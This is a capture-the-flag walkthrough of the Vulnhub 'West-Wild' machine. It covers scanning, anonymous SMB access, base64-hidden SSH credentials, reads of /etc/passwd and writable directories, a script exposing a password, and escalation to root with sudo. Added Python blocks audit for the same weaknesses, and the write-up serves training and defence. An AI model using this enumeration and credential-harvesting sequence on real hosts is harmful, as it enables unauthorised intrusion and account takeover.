Vulnhub——West-Wild
Information gathering
Live host scan
Target IP: 192.168.197.168
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.197.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-01 09:18 CST
Nmap scan report for bogon (192.168.197.1)
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for bogon (192.168.197.2)
Host is up (0.00022s latency).
MAC Address: 00:50:56:F2:C0:58 (VMware)
Nmap scan report for bogon (192.168.197.168)
Host is up (0.00038s latency).
MAC Address: 00:0C:29:B5:E6:8D (VMware)
Nmap scan report for bogon (192.168.197.254)
Host is up (0.00023s latency).
MAC Address: 00:50:56:F1:71:34 (VMware)
Nmap scan report for bogon (192.168.197.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.95 seconds
Port probing
Open ports: 22, 80, 139, 445
┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.197.168
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-01 09:18 CST
Nmap scan report for bogon (192.168.197.168)
Host is up (0.00049s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 6f:ee:95:91:9c:62:b2:14:cd:63:0a:3e:f8:10:9e:da (DSA)
| 2048 10:45:94:fe:a7:2f:02:8a:9b:21:1a:31:c5:03:30:48 (RSA)
| 256 97:94:17:86:18:e2:8e:7a:73:8e:41:20:76:ba:51:73 (ECDSA)
|_ 256 23:81:c7:76:bb:37:78:ee:3b:73:e2:55:ad:81:32:72 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:B5:E6:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: 0s
| smb2-time:
| date: 2023-08-01T01:18:39
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: westwild
| NetBIOS computer name: WESTWILD\x00
| Domain name: \x00
| FQDN: westwild
|_ System time: 2023-08-01T04:18:39+03:00
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms bogon (192.168.197.168)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds
Exploitation
Checking port 80
Nothing useful on the page itself; directory brute-forcing with dirsearch also turns up nothing useful
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.197.168
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.197.168/_23-08-01_09-22-43.txt
Error Log: /root/.dirsearch/logs/errors-23-08-01_09-22-43.log
Target: http://192.168.197.168/
[09:22:43] Starting:
[09:22:45] 403 - 293B - /.ht_wsr.txt
[09:22:45] 403 - 296B - /.htaccess.orig
[09:22:45] 403 - 294B - /.htaccessOLD
[09:22:45] 403 - 296B - /.htaccess.bak1
[09:22:45] 403 - 296B - /.htaccess_orig
[09:22:45] 403 - 298B - /.htaccess.sample
[09:22:45] 403 - 297B - /.htaccess_extra
[09:22:45] 403 - 296B - /.htaccess.save
[09:22:45] 403 - 295B - /.htaccessOLD2
[09:22:45] 403 - 294B - /.htaccess_sc
[09:22:45] 403 - 294B - /.htaccessBAK
[09:22:45] 403 - 287B - /.html
[09:22:45] 403 - 286B - /.htm
[09:22:45] 403 - 296B - /.htpasswd_test
[09:22:45] 403 - 292B - /.htpasswds
[09:22:45] 403 - 293B - /.httr-oauth
[09:22:46] 403 - 287B - /.php3
[09:22:46] 403 - 286B - /.php
[09:23:07] 200 - 263B - /index.html
[09:23:18] 403 - 296B - /server-status/
[09:23:18] 403 - 295B - /server-status
Task Completed
Port 445 (SMB) is open, so there may be shared directories
Checking with smbmap shows a share named wave
┌──(root㉿kali)-[~]
└─# smbmap -H 192.168.197.168
[+] Guest session IP: 192.168.197.168:445 Name: bogon
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
wave READ ONLY WaveDoor
IPC$ NO ACCESS IPC Service (WestWild server (Samba, Ubuntu))
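The smbmap step above is the point where a defender would want an automated check for shares exposed to anonymous clients. The following is an added example (not part of the original post or of smbmap itself) that parses a captured smbmap listing and reports which shares a guest session can read or write; the sample output is a constructed copy of the listing shown above, and the column layout it expects is the standard smbmap table.

```python
import re

# Constructed copy of the smbmap output shown in the walkthrough (no live host needed).
SMBMAP_OUTPUT = """\
[+] Guest session       IP: 192.168.197.168:445 Name: bogon
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        wave                                                    READ ONLY       WaveDoor
        IPC$                                                    NO ACCESS       IPC Service (WestWild server (Samba, Ubuntu))
"""

# One share row: name, one of smbmap's permission strings, optional comment.
SHARE_LINE = re.compile(
    r"^\s*(\S+)\s+(NO ACCESS|READ ONLY|WRITE ONLY|READ, WRITE)\s*(.*?)\s*$"
)


def parse_smbmap(output: str) -> dict:
    """Return whether the listing came from a guest (anonymous) session and
    the parsed share rows; header and separator lines never match SHARE_LINE."""
    guest = re.search(r"\[\+\]\s*Guest session", output) is not None
    shares = []
    for line in output.splitlines():
        m = SHARE_LINE.match(line)
        if m:
            shares.append({"name": m.group(1), "perm": m.group(2), "comment": m.group(3)})
    return {"guest_session": guest, "shares": shares}


def anonymous_exposures(output: str) -> list:
    """Names of shares an unauthenticated client can read or write.
    IPC$ is skipped because every Samba host lists it; only data shares count."""
    parsed = parse_smbmap(output)
    if not parsed["guest_session"]:
        return []
    return [
        s["name"]
        for s in parsed["shares"]
        if s["perm"] != "NO ACCESS" and s["name"] != "IPC$"
    ]


if __name__ == "__main__":
    for share in anonymous_exposures(SMBMAP_OUTPUT):
        print("anonymous access to share:", share)
```

Feed it the output of `smbmap -H <host>` from an unauthenticated run; an empty result for a host that should not serve anonymous data is the expected baseline, and any share it names is a finding to fix in smb.conf (for this box, `wave`).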
Connecting with smbclient
┌──(root㉿kali)-[~]
└─# smbclient //192.168.197.168/wave
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 30 13:18:56 2019
.. D 0 Fri Aug 2 07:02:20 2019
FLAG1.txt N 93 Tue Jul 30 10:31:05 2019
message_from_aveng.txt N 115 Tue Jul 30 13:21:48 2019
1781464 blocks of size 1024. 282780 blocks available
There are two .txt files in the share
Save them locally
smb: \> get FLAG1.txt
getting file \FLAG1.txt of size 93 as FLAG1.txt (30.3 KiloBytes/sec) (average 30.3 KiloBytes/sec)
smb: \> get message_from_aveng.txt
getting file \message_from_aveng.txt of size 115 as message_from_aveng.txt (56.1 KiloBytes/sec) (average 40.6 KiloBytes/sec)
smb: \> quit
Getting the first flag
Viewing FLAG1.txt gives the first flag; it looks base64-encoded, so try decoding it
┌──(root㉿kali)-[~]
└─# cat FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K
┌──(root㉿kali)-[~]
└─# cat message_from_aveng.txt
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset it for me .
Thank You
Aveng
That yields one flag and a set of credentials
SSH login with them succeeds
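The decoding step above is not shown in the post. As an added example (not the post author's code), the block below performs it and goes one step further: it triages a file pulled from an anonymously readable share, decoding it only if it is strict base64 with a printable payload, and reporting which credential-style fields (`user:`, `password:`, ...) it contains. The FLAG1.txt content is a constructed copy of the string shown above; the field-name list and the printability heuristic are my own choices.

```python
import base64
import binascii
import re

# Constructed copy of the FLAG1.txt content retrieved from the wave share.
FLAG1_B64 = (
    "RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0K"
    "dXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K"
)

_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Field names treated as credential material (assumed list, extend as needed).
CRED_KEYS = {"user", "username", "login", "pass", "password", "passwd", "pwd"}


def try_base64_decode(blob: str):
    """Decode blob if it is strict base64 whose payload is printable text;
    return None otherwise. Ordinary prose fails the alphabet or length check,
    and random binary fails the UTF-8 / printability check."""
    s = "".join(blob.split())
    if len(s) < 16 or len(s) % 4 or not _B64_RE.match(s):
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def extract_credentials(text: str) -> dict:
    """Collect key:value lines whose key names a credential field."""
    found = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() in CRED_KEYS:
            found[key.strip().lower()] = value.strip()
    return found


def triage_share_file(name: str, content: str) -> dict:
    """Summarise what a file exposed on a share leaks, decoding base64 first."""
    decoded = try_base64_decode(content)
    text = decoded if decoded is not None else content
    creds = extract_credentials(text)
    return {
        "file": name,
        "base64": decoded is not None,
        "first_line": text.splitlines()[0] if text else "",
        "credential_fields": sorted(creds),   # names only; values stay out of reports
    }


if __name__ == "__main__":
    print(triage_share_file("FLAG1.txt", FLAG1_B64))
```

Reporting field names rather than values keeps the triage output safe to paste into a ticket; the point of the check is that a file readable by `Anonymous login` carried a username and password at all.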
┌──(root㉿kali)-[~]
└─# ssh wavex@192.168.197.168
wavex@192.168.197.168's password:
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Aug 1 12:16:18 +03 2023
System load: 0.0 Memory usage: 4% Processes: 161
Usage of /: 77.9% of 1.70GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Aug 2 02:00:40 2019
wavex@WestWild:~$ id
uid=1001(wavex) gid=1001(wavex) groups=1001(wavex)
Checking the user's sudo privileges
The password check fails: wavex may not run sudo on WestWild
wavex@WestWild:~$ sudo -l
[sudo] password for wavex:
Sorry, user wavex may not run sudo on WestWild.
Checking scheduled tasks
Nothing usable here either
wavex@WestWild:/home/aveng$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Checking the passwd file
There is another user, aveng
wavex@WestWild:/home/aveng$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
aveng:x:1000:1000:aveng,,,:/home/aveng:/bin/bash
wavex:x:1001:1001:XxWavexX,,,:/home/wavex:/bin/bash
Checking which directories are writable
wavex@WestWild:/home/aveng$ find / -writable -type d 2>/dev/null
/sys/fs/cgroup/systemd/user/1001.user/1.session
/usr/share/av/westsidesecret
/home/wavex
/home/wavex/.cache
/home/wavex/wave
/var/lib/php5
/var/spool/samba
/var/crash
/var/tmp
/proc/1750/task/1750/fd
/proc/1750/fd
/proc/1750/map_files
/run/user/1001
/run/shm
/run/lock
/tmp
Checking the /usr/share/av/westsidesecret directory
It contains a set of credentials
user:aveng password:kaizen+80
wavex@WestWild:/home/aveng$ cd /usr/share/av/westsidesecret/
wavex@WestWild:/usr/share/av/westsidesecret$ ls -al
total 12
drwxrwxrwx 2 root root 4096 Jul 30 2019 .
drwxr-xr-x 3 root root 4096 Jul 30 2019 ..
-rwxrwxrwx 1 wavex wavex 101 Jul 30 2019 ififoregt.sh
wavex@WestWild:/usr/share/av/westsidesecret$ cat ififoregt.sh
#!/bin/bash
figlet "if i foregt so this my way"
echo "user:aveng"
echo "password:kaizen+80"
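The `find / -writable` step and the script it uncovers are the two findings a host audit should catch before an attacker does: a world-writable directory outside the sticky-bit scratch locations, and a script with a hard-coded password. As an added example (not part of the original post), the block below implements that audit in Python and builds a constructed temporary tree mirroring the layout on this box; the directory names are copied from the walkthrough, the password value in the fixture is a placeholder, and the secret-pattern regex is an assumption you would tune for your environment.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Anything that looks like a key/value secret assignment in a text file (assumed pattern).
SECRET_RE = re.compile(r"\b(password|passwd|pass|pwd|secret|token)\s*[:=]", re.IGNORECASE)


def world_writable_finding(path: Path) -> bool:
    """True if 'others' can write here. Sticky directories such as /tmp are
    world-writable by design, so they are not reported."""
    mode = path.lstat().st_mode
    if not mode & stat.S_IWOTH:
        return False
    return not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX)


def looks_like_credentials(path: Path) -> bool:
    """Scan the first 64 KiB of a file for a secret-looking assignment."""
    try:
        with path.open("rb") as fh:
            head = fh.read(65536).decode("utf-8", "ignore")
    except OSError:
        return False
    return SECRET_RE.search(head) is not None


def audit_tree(root: Path) -> dict:
    """Walk root; report world-writable dirs/files and credential-bearing files."""
    report = {"world_writable": [], "credential_files": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        d = Path(dirpath)
        if world_writable_finding(d):
            report["world_writable"].append(str(d))
        for name in filenames:
            f = d / name
            if f.is_symlink():
                continue
            if world_writable_finding(f):
                report["world_writable"].append(str(f))
            if looks_like_credentials(f):
                report["credential_files"].append(str(f))
    return report


def build_demo_tree() -> Path:
    """Constructed fixture: the westsidesecret layout plus a clean dir and a sticky tmp."""
    root = Path(tempfile.mkdtemp(prefix="westwild-audit-"))
    secret_dir = root / "usr/share/av/westsidesecret"
    doc_dir = root / "usr/share/doc"
    tmp_dir = root / "tmp"
    for d in (secret_dir, doc_dir, tmp_dir):
        d.mkdir(parents=True, exist_ok=True)
    for dirpath, dirnames, _ in os.walk(root):      # normalise every dir to 0755 first
        for dn in dirnames:
            os.chmod(Path(dirpath) / dn, 0o755)
    script = secret_dir / "ififoregt.sh"
    script.write_text('#!/bin/bash\necho "user:aveng"\necho "password:PLACEHOLDER-NOT-THE-REAL-ONE"\n')
    (doc_dir / "README").write_text("nothing sensitive here\n")
    os.chmod(secret_dir, 0o777)          # drwxrwxrwx, as seen on the box
    os.chmod(script, 0o777)              # -rwxrwxrwx, as seen on the box
    os.chmod(doc_dir / "README", 0o644)
    os.chmod(tmp_dir, 0o1777)            # sticky, like a real /tmp: must not be reported
    return root


def relative_report(root: Path) -> dict:
    """audit_tree() with paths made relative to root and sorted, for stable output."""
    rep = audit_tree(root)
    return {k: sorted(os.path.relpath(p, root) for p in v) for k, v in rep.items()}


if __name__ == "__main__":
    demo = build_demo_tree()
    for key, paths in relative_report(demo).items():
        print(key)
        for p in paths:
            print("   ", p)
```

Run `audit_tree(Path("/"))` as root on a real host to get the same two lists; on this box both would point at `/usr/share/av/westsidesecret/ififoregt.sh`, which is exactly the file that hands over the aveng account.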
Switching to user aveng
wavex@WestWild:/usr/share/av/westsidesecret$ su aveng
Password:
aveng@WestWild:/usr/share/av/westsidesecret$ id
uid=1000(aveng) gid=1000(aveng) groups=1000(aveng),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),114(lpadmin)
Privilege escalation
Checking the user's sudo privileges
aveng@WestWild:/usr/share/av/westsidesecret$ sudo -l
[sudo] password for aveng:
Matching Defaults entries for aveng on WestWild:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aveng may run the following commands on WestWild:
(ALL : ALL) ALL
Getting root
aveng may run any command with sudo, so escalate directly to a root shell and read the second flag
aveng@WestWild:/usr/share/av/westsidesecret$ sudo /bin/bash
root@WestWild:/usr/share/av/westsidesecret# cd /root
root@WestWild:/root# ls
FLAG2.txt
root@WestWild:/root# cat FLAG2.txt
Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}
Great! take a screenshot and Share it with me in twitter @HashimAlshareff